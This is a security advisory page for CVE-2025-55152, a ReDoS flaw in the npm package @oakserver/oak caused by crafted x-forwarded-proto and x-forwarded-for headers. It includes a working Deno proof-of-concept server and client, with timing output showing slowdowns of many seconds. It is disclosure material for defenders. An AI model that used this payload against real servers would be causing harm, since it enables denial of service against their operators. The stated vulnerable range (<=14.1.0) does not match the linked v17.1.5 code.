logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-55152 @oakserver/oak

Package

Manager: npm
Name: @oakserver/oak
Vulnerable Version: >=0 <=14.1.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

EPSS: 0.00051 pctl0.1555

Details

Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers ### Summary With specially crafted value of the `x-forwarded-proto` or `x-forwarded-for` headers, it's possible to significantly slow down an oak server. ### Vulnerable Code - https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87 - https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142 ### PoC - setup ``` deno --version deno 2.4.3 v8 13.7.152.14-rusty typescript 5.8.3 ``` - `server.ts` ```ts import { Application } from "https://deno.land/x/oak/mod.ts"; const app = new Application({proxy: true}); let i = 1 app.use((ctx) => { // let url = ctx.request.url // test1) x-forwarded-proto let ips = ctx.request.ips // test2) x-forwarded-for console.log(`request ${i} received`) i++; ctx.response.body = "hello"; }); await app.listen({ port: 8080 }); ``` - `client.ts` ```ts const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000] const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A'); const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A'); async function run(data) { for (let i = 0; i < data.length; i++) { let d = data[i]; const start = performance.now(); await fetch("http://localhost:8080", { headers: { // "x-forwarded-proto": d, // test1) "x-forwarded-for": d, // test2) }, }); const end = performance.now(); console.log('length=%d, time=%d ms', d.length, end - start); } } console.log("\n[+] Test normal behavior") await run(data1) console.log("\n[+] Test payloads") await run(data2) ``` - run ``` deno run --allow-net server.ts deno run --allow-net client.ts [+] Test normal behavior length=2002, time=14 ms length=4002, time=6 ms length=8002, time=3 ms length=16002, time=3 ms length=32002, time=2 ms length=64002, time=4 ms length=128002, time=3 ms [+] Test payloads length=2002, time=7 ms length=4002, time=22 ms length=8002, time=77 ms length=16002, time=241 ms length=32002, time=947 ms length=64002, time=4020 ms length=128002, time=15840 ms ``` ### Impact A specially crafted value of the `x-forwarded-proto` or `x-forwarded-for` headers  can be used to significantly slow down an oak server. ### Similar Issues - https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6 - https://github.com/denoland/deno/pull/17722 - https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693 - https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff

Metadata

Created: 2025-08-12T00:15:00Z
Modified: 2025-08-12T00:15:00Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-r3v7-pc4g-7xp9/GHSA-r3v7-pc4g-7xp9.json
CWE IDs: ["CWE-400"]
Alternative ID: GHSA-r3v7-pc4g-7xp9
Finding: F211
Auto approve: 1